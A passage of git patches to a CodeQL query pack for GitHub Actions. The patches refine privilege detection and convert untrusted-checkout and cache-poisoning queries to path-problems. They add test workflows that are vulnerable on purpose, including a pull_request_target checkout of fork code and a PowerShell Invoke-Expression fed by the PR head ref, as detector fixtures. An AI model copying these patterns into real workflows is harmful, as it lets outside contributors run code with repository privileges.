+65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -243,6 +245,10 @@ nodes | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 1fd7c148a5e771ae5041ea0e5d34f2c57e1df3e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 13:58:25 +0200 Subject: [PATCH 0348/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index aece8aacc5f..761554c60e6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.3 +version: 0.1.4 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 74678b945ca..9ccc911594f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.3 +version: 0.1.4 groups: [actions, queries] suites: codeql-suites extractor: javascript From e6311966c80fae7fdf43db6ff43c88600933d08e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 16:17:07 +0200 Subject: [PATCH 0349/1267] Take explicit permission into account for privilege calculation --- ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++++-- .../CWE-349/.github/workflows/test20.yml | 46 +++++++++++++++++++ .../CWE-829/.github/workflows/test4.yml | 46 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 - .../CWE-829/UntrustedCheckoutMedium.expected | 2 + 5 files changed, 118 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 8d965c3e4c7..2deb987650c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -848,11 +848,23 @@ class JobImpl extends AstNodeImpl, TJobNode { this.getPermissions().getAPermission().matches("%write") } + private predicate hasExplicitReadPermission() { + // the job has not an explicit write permission + exists(this.getPermissions().getAPermission()) and + not this.getPermissions().getAPermission().matches("%write") + } + private predicate hasImplicitWritePermission() { // the job has an explicit write permission this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") } + private predicate hasImplicitReadPermission() { + // the job has not an explicit write permission + exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and + not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + } + private predicate hasRuntimeData() { exists(string path, string trigger, string name, string secrets_source, string perms | workflowDataModel(path, trigger, name, secrets_source, perms, _) and @@ -892,8 +904,7 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { - exists(EventImpl e | - this.getATriggerEvent() = e and + exists(EventImpl e | this.getATriggerEvent() = e | // job is triggereable by an external user e.isExternallyTriggerable() and // no matter if `pull_request` is granted write permissions or access to secrets @@ -903,9 +914,18 @@ class JobImpl extends AstNodeImpl, TJobNode { // job is privileged (write access or access to secrets) this.isPrivileged() or - // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise + // the trigger event is __normally__ privileged + e.isPrivileged() and + // and we have no runtime data to prove otherwise not this.hasRuntimeData() and - e.isPrivileged() + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() + ) ) ) } diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml new file mode 100644 index 00000000000..a07f2922fd7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml @@ -0,0 +1,46 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml new file mode 100644 index 00000000000..a07f2922fd7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -0,0 +1,46 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 0ff47fd2c53..92d5a0b5ce1 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -4,6 +4,5 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 544d26da9b7..5bf0e56e1b7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,5 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 5cd292e23e034a593f1feac0f5bba0bac2c4666c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:17:37 +0200 Subject: [PATCH 0350/1267] Make Untrusted Checkout and CachePoisoning rules path-problems --- ql/src/Security/CWE-349/CachePoisoning.ql | 7 +- .../CWE-829/UntrustedCheckoutCritical.ql | 10 +- .../CWE-094/.github/workflows/test8.yml | 48 +++ .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 2 + .../Security/CWE-349/CachePoisoning.expected | 134 ++++++++- .../UntrustedCheckoutCritical.expected | 273 +++++++++++++++++- 7 files changed, 451 insertions(+), 27 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index feef4316461..2a9952ce07f 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -1,7 +1,7 @@ /** * @name Cache Poisoning * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. - * @kind problem + * @kind path-problem * @problem.severity error * @precision high * @security-severity 7.5 @@ -16,6 +16,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where j.getATriggerEvent() = e and @@ -48,5 +50,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, - s.toString() +select s, checkout, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index eae580ebd52..b71b3cbba99 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -3,7 +3,7 @@ * @description Priveleged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. - * @kind problem + * @kind path-problem * @problem.severity error * @precision very-high * @security-severity 9.3 @@ -17,12 +17,14 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + +from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s where j = checkout.getEnclosingJob() and j.getAStep() = checkout and // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() instanceof PoisonableStep and + checkout.getAFollowingStep() = s and // the checkout is not controlled by an access check not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context @@ -31,4 +33,4 @@ where or inPrivilegedExternallyTriggerableJob(checkout) ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." +select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml new file mode 100644 index 00000000000..3b532e4cc67 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml @@ -0,0 +1,48 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - 'images/**' + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 + } diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f34915f45c2..1b98263c16e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -348,6 +350,8 @@ subpaths | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d919880e726..35887c3b370 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index d434bd63c51..6a91d49c0ca 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,12 +1,122 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | +edges +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | 